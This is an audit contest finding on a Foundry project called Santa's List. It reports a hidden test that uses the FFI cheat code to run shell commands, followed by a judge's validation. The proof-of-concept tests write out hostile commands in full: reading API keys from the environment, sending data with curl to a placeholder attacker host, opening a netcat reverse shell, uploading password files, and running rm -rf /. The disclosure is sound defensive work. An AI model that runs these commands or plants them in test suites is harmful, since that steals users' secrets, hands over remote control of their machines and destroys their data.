First Flight #5: Santa's List
First Flight #5
Beginner FriendlyFoundry
100 EXP
View results
Previous Next
Submission Details
Severity: high
Valid

Malicious Test potentially allowing data extraction from the user running it

0xrektified

Summary

The test suite includes a function named testPwned, which executes arbitrary commands on the user's machine.
This presents a significant security risk, as such commands could potentially extract sensitive data, establish a reverse shell for remote control, search for passwords, or install malware.

Vulnerability Details

This is the malicious test, it looks inoffensive as it just create a file called youve-been-pwned but there is no underlying reason for this test to be here except a malicious behavior.

function testPwned() public {
string[] memory cmds = new string[](2);
cmds[0] = "touch";
cmds[1] = string.concat("youve-been-pwned");
cheatCodes.ffi(cmds);
}

A more alarming scenario is demonstrated in the following proof of concept, where the user's API key could be compromised:.

First export the api key in your shell

export ARBITRUMSCAN_API_KEY='MY_SECRET_KEY'

Then execute the test to store the API key in a file:

function testWriteCommande() public {
string[] memory cmds = new string[](3);
cmds[0] = "bash";
cmds[1] = "-c";
cmds[2] = "env | grep ARBITRUMSCAN_API_KEY > PwnedApiKey";
cheatCodes.ffi(cmds);
}

Alternatively, transmit it to an external server:

cmds[2] = "curl 'https://<HACKER_IP>?arbitrum_rpc_url='$(env | grep ARBITRUM_RPC_URL | cut -d '=' -f2)";

Other interesting POC that qualify this issue as a HIGH

POC 1: Reverse Shell Using Netcat

This POC demonstrates how a test could open a reverse shell, allowing an attacker to gain control over the user's machine.

function testReverseShell() public {
string[] memory cmds = new string[](3);
cmds[0] = "bash";
cmds[1] = "-c";
cmds[2] = "nc -e /bin/bash <HACKER_IP> <PORT>";
cheatCodes.ffi(cmds);
}

POC 2: Finding Files and Sending Results to a Server

This POC shows how a test could find specific files (starting with "pass" ) and send the results to a remote server.

function testFindCommand() public {
string[] memory cmds = new string[](3);
cmds[0] = "bash";
cmds[1] = "-c";
cmds[2] = "find / -name 'pass*' | curl -F 'data=@-' https://<HACKER_IP>/upload";
cheatCodes.ffi(cmds);
}

POC 3: Destructive Command (rm -rf /)

This POC demonstrates a highly destructive command that could potentially erase all data on the user's root filesystem.

Warning: This command is extremely harmful and should never be executed.

function testDestructiveCommand() public {
string[] memory cmds = new string[](2);
cmds[0] = "bash";
cmds[1] = "-c";
cmds[2] = "rm -rf /";
cheatCodes.ffi(cmds);
}

Important Disclaimer: The rm -rf / command will delete everything on the filesystem for which the user has write permissions. It is provided here strictly for educational purposes to demonstrate the severity of security vulnerabilities in scripts and should never be run on any system.

Impact

This issue is categorized as HIGH due to the direct risk it poses to funds and sensitive information.

The test, as it stands, is harmful, as it is used in a security contexts but i assume that the general purpose of this functionality is to be harmfull.

It could lead to data breaches (including private keys and passwords), unauthorized remote code execution, and the potential destruction of digital information (e.g., rm -rf /).

Tools Used

forge test 😅

Recommendations

Always exercise caution before running third-party programs on your system.
Ensure you understand the functionality of any command or script to prevent unintended consequences, especially those involving security vulnerabilities.

Updates

Lead Judging Commences

inallhonesty Lead Judge over 1 year ago
Submission Judgement Published
Validated
Assigned finding tags:

test_pwned FFI vulnerability

The FFI variable within Foundry.TOML was set to TRUE. This variable gives foundry shell access and allows it to run commands on your terminal. The possibility of exploitation through this means are endless! This repo exploited this flag through test_pwned Keep an eye out before running tests!

billobaggebilleyan Auditor
over 1 year ago
0xrektified Submitter
over 1 year ago
billobaggebilleyan Auditor
over 1 year ago
0xrektified Submitter
over 1 year ago
billobaggebilleyan Auditor
over 1 year ago
equious Auditor
over 1 year ago
inallhonesty Lead Judge over 1 year ago
Submission Judgement Published
Validated
Assigned finding tags:

test_pwned FFI vulnerability

The FFI variable within Foundry.TOML was set to TRUE. This variable gives foundry shell access and allows it to run commands on your terminal. The possibility of exploitation through this means are endless! This repo exploited this flag through test_pwned Keep an eye out before running tests!

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.